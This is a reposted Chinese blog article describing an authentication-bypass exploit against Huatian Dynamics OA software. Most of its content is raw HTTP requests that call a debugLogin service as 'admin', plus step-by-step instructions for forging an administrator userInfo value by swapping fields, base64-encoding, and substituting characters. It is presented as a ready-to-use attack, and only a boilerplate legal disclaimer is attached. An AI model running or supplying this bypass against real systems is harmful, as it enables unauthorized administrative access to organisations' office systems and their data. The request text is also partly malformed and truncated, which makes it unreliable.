第一步:
POST /OAapp/HtEntranceService.do HTTP/1.
1Host: xxx
Content-Length: 64
Pragma: no-cache
Content-Security-Policy: default-src 'self'; script-src 'self'; frame-ancestors 'self'; object-src 'none'
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
X-Content-Type-Options: nosniff
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Cache-Control: no-cache
X-XSS-Protection: 1
Origin: http://xxx
Referer: http://xxx/OAapp/htpages/app/module/login/8.0Login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"service":"debugService","method":"debugLogin","code":"admin"}
POST /OAapp/htpages/app/module/portal_FLOW/view/8.0MainPor.jsp HTTP/1.1
Host: xxx
Content-Length: 636
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx/OAapp/htpages/app/module/login/8.0Login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: OA_USER_SHOW_ID=admin; OA_USER_KEY=ebb3d4f06b71442facf28c07805c6a70
Connection: close
userInfo=eyJvdGhlckluZm9Nb2RlbCI6IjExMTEiLCJ1c2VyU2hvd0lkIjoiYWRtaW4iLCJyZWFsVXNlckl
userinfo组成:
{"otherInfoModel":"eyJqc3BUaXRsZSI6IuaIkOWKnyIsImNoYW5nZVBzZEZsZyI6ZmFsc2UsImRlZmF1bHRDb2xvclN0eWxlIjp7InRoZW1lSUQiOiIxMCIsIm5hdmJhckhlYWRlckNvbG9yIjoiYmctZGFya0JsdWUgYmctaGVhZGVyLWRhcmtCbHVlIiwibmF2YmFyQ29sbGFwc2VDb2xvciI6ImJnLWRhcmtCbHVlIiwiYXNpZGVDb2xvciI6ImJnLWxlZnQtZGFya0JsdWUiLCJjb250ZW50Q29sb3IiOiJodC1kYXJrQmx1ZSIsImhlYWRlckZpeGVkIjp0cnVlLCJhc2lkZUZpeGVkIjp0cnVlLCJhc2lkZUZvbGRlZCI6ZmFsc2UsImFzaWRlRG9jayI6ZmFsc2UsIm5vSGVhZENzcyI6IiIsImNvbnRhaW5lciI6ZmFsc2V9fQx7x;x7x;","userShowId":"admin","realUserId":"admi","userName":"管理员","deptId":"ROOT","deptName":"aaa","companyId":"ROOT","companyName":"aaa","languageType":"CN","showType":0,"code":"IM_52ae810f362f412d818f68248ce7c1fe","randomCode":"IM_52ae810f362f412d818f68248ce7c1fe","versionToken":"10.20-1","debugFlg":"0","colorStyle":"BLUE","currentCssPath":"/OAapp/htpages/app/css/CN/public/","portalType":"_FLOW","headPhotoId":"","pinyin":"admin","superManagerFlg":false}
otherInfoModel组成:
{"jspTitle":"成功","changePsdFlg":false,"defaultColorStyle":{"themeID":"1","navbarHeaderColor":" bg-info bg-header-info","navbarCollapseColor":"bg-info","asideColor":"bg-left-info","contentColor":"ht-blue","headerFixed":true,"asideFixed":true,"asideFolded":false,"asideDock":false,"noHeadCss":"","container":false}}
需要替换相关用户名字段(userShowId、realUserId、pinyin)、code、randomcode,以及otherInfoModel中的defaultColorStyle,这些信息在debugLogin请求的响应包base64解密后都能看到。
替换之后需要对otherInfoModel base64编码,替换=为x7x; +为x6x; 之后替换userinfo中的otherInfoModel。
然后需要对修改后的userinfo整体,base64编码,之后替换=为x7x; +为x6x;
.
原文始发于微信公众号(极梦C):拿不下靶标后台就100分-华天动力OA登录绕过自动化脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论